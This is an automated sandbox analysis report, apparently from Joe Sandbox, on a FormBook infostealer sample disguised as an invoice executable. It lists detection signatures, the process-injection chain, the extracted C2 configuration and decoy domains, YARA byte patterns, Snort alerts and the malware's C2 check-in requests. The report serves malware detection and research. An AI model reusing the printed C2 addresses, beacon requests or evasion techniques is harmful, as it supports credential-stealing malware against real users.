Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report INV74321.exe

Overview

General Information

Sample Name:INV74321.exe
Analysis ID:411840
MD5:877bb5661fe79bb7f48cfb3ea54537a0
SHA1:dd6b5263da3b4f1a42e89c2c1ade852098561c5d
SHA256:87935ff36515ecb6a4177c25ad1d11e8d2882aa1c3f369e719406f063a062517
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • INV74321.exe (PID: 5520 cmdline: 'C:\Users\user\Desktop\INV74321.exe' MD5: 877BB5661FE79BB7F48CFB3EA54537A0)
    • INV74321.exe (PID: 4604 cmdline: 'C:\Users\user\Desktop\INV74321.exe' MD5: 877BB5661FE79BB7F48CFB3EA54537A0)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 6292 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6480 cmdline: /c del 'C:\Users\user\Desktop\INV74321.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nobleandmarble.com/or4i/"], "decoy": ["cylindberg.com", "qsmpy.world", "hairmaxxclinic.com", "teesfitpro.com", "changethecompany.net", "painteredmond.com", "shebagholdings.com", "wasteexport.com", "salesclerkadage.life", "rainboxs.com", "lingoblasterdiscount.com", "booweats.com", "topcasino-111.com", "downtoearthwork.com", "carry-hai.com", "nassaustreetcorp.com", "directflence.com", "basictrainningphothos.com", "virtualayurveda.com", "dar-sanidad.com", "businessenglish.company", "safegrinder.com", "blissfulyogamullicahill.com", "smartmatch-dating-api.com", "heaset.com", "fingerpointingimp.com", "rogersbeefarm.com", "guysgunsandcountry.com", "attackbit.com", "bawalturki.com", "goodmanifest.com", "healshameyoga.com", "citiphoneonline.com", "canaltransportllc.com", "theflagdude.com", "mmgenius.com", "ikeberto.com", "sky-cargo.net", "tecquestrian.com", "ashleylovica.com", "contorig2.com", "nowhealthdays.com", "dadaoliangpi.com", "three.guide", "anoussa.com", "fanyingfu001.com", "matthewdimartino.com", "ventadearticulosreligiosos.com", "collegesupermatch.com", "king-jackpot.com", "puppillows.store", "woodforsmoke.com", "globaltradesclub.com", "flipkart-max-sale.xyz", "carlyle-cocao.com", "cuntrera.com", "sadafalbahariq.com", "spmomgoals.com", "mk-365.com", "yanghuoquan.com", "xn--espacesacr-k7a.com", "pidelodirecto.com", "0o-a-8v4l76.net", "aqayeseo.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.INV74321.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.INV74321.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.INV74321.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        0.2.INV74321.exe.29a0000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.INV74321.exe.29a0000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.nobleandmarble.com/or4i/"], "decoy": ["cylindberg.com", "qsmpy.world", "hairmaxxclinic.com", "teesfitpro.com", "changethecompany.net", "painteredmond.com", "shebagholdings.com", "wasteexport.com", "salesclerkadage.life", "rainboxs.com", "lingoblasterdiscount.com", "booweats.com", "topcasino-111.com", "downtoearthwork.com", "carry-hai.com", "nassaustreetcorp.com", "directflence.com", "basictrainningphothos.com", "virtualayurveda.com", "dar-sanidad.com", "businessenglish.company", "safegrinder.com", "blissfulyogamullicahill.com", "smartmatch-dating-api.com", "heaset.com", "fingerpointingimp.com", "rogersbeefarm.com", "guysgunsandcountry.com", "attackbit.com", "bawalturki.com", "goodmanifest.com", "healshameyoga.com", "citiphoneonline.com", "canaltransportllc.com", "theflagdude.com", "mmgenius.com", "ikeberto.com", "sky-cargo.net", "tecquestrian.com", "ashleylovica.com", "contorig2.com", "nowhealthdays.com", "dadaoliangpi.com", "three.guide", "anoussa.com", "fanyingfu001.com", "matthewdimartino.com", "ventadearticulosreligiosos.com", "collegesupermatch.com", "king-jackpot.com", "puppillows.store", "woodforsmoke.com", "globaltradesclub.com", "flipkart-max-sale.xyz", "carlyle-cocao.com", "cuntrera.com", "sadafalbahariq.com", "spmomgoals.com", "mk-365.com", "yanghuoquan.com", "xn--espacesacr-k7a.com", "pidelodirecto.com", "0o-a-8v4l76.net", "aqayeseo.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dllMetadefender: Detection: 26%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dllReversingLabs: Detection: 55%
          Multi AV Scanner detection for submitted fileShow sources
          Source: INV74321.exeVirustotal: Detection: 30%Perma Link
          Source: INV74321.exeMetadefender: Detection: 14%Perma Link
          Source: INV74321.exeReversingLabs: Detection: 72%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 1.1.INV74321.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.INV74321.exe.29a0000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.INV74321.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: INV74321.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: INV74321.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000005.00000000.244743152.000000000F686000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: INV74321.exe, 00000000.00000003.214730841.0000000002B90000.00000004.00000001.sdmp, INV74321.exe, 00000001.00000002.257577232.0000000000BCF000.00000040.00000001.sdmp, wlanext.exe, 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: INV74321.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: INV74321.exe, 00000001.00000002.257445495.0000000000A50000.00000040.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000005.00000000.244743152.000000000F686000.00000004.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: INV74321.exe, 00000001.00000002.257445495.0000000000A50000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 4x nop then pop ebx1_2_00406A95
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 4x nop then pop ebx1_1_00406A95
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop ebx8_2_030B6A95

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 119.18.54.126:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 119.18.54.126:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 119.18.54.126:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 163.43.122.109:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 163.43.122.109:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 163.43.122.109:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 104.21.46.55:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 104.21.46.55:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 104.21.46.55:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.nobleandmarble.com/or4i/
          Source: global trafficHTTP traffic detected: GET /or4i/?iN6=xDS7CyCJ4m7HrOhyeYRIonE7yEohNWwwbSjxvOh7bSQREc8K1tWvWT2hFG1Cb6Pxbdkw&KdTL=a2JxONfH HTTP/1.1Host: www.king-jackpot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn HTTP/1.1Host: www.0o-a-8v4l76.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfH HTTP/1.1Host: www.downtoearthwork.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfH HTTP/1.1Host: www.topcasino-111.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=JH4nS7VeW/UW/jbaFlzhauiIX/+RMeGdEmcv+8JYSHoft+e37yOEU8VwtY3nHc6WUP+N HTTP/1.1Host: www.shebagholdings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?iN6=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QijbP8ODf8&KdTL=a2JxONfH HTTP/1.1Host: www.booweats.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=aXFVbdpXZKuOxG6QcVTci15xYCj/Qxdw9P9YBGKWWpBj56F6fv1TkawGdiCQA9RepvWh HTTP/1.1Host: www.xn--espacesacr-k7a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 64.190.62.111 64.190.62.111
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
          Source: Joe Sandbox ViewASN Name: NBS11696US NBS11696US
          Source: global trafficHTTP traffic detected: GET /or4i/?iN6=xDS7CyCJ4m7HrOhyeYRIonE7yEohNWwwbSjxvOh7bSQREc8K1tWvWT2hFG1Cb6Pxbdkw&KdTL=a2JxONfH HTTP/1.1Host: www.king-jackpot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn HTTP/1.1Host: www.0o-a-8v4l76.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfH HTTP/1.1Host: www.downtoearthwork.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfH HTTP/1.1Host: www.topcasino-111.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=JH4nS7VeW/UW/jbaFlzhauiIX/+RMeGdEmcv+8JYSHoft+e37yOEU8VwtY3nHc6WUP+N HTTP/1.1Host: www.shebagholdings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?iN6=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QijbP8ODf8&KdTL=a2JxONfH HTTP/1.1Host: www.booweats.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=aXFVbdpXZKuOxG6QcVTci15xYCj/Qxdw9P9YBGKWWpBj56F6fv1TkawGdiCQA9RepvWh HTTP/1.1Host: www.xn--espacesacr-k7a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.aqayeseo.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 May 2021 05:36:25 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 24 Feb 2021 17:47:31 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
          Source: explorer.exe, 00000005.00000000.244675991.000000000F640000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: INV74321.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: INV74321.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
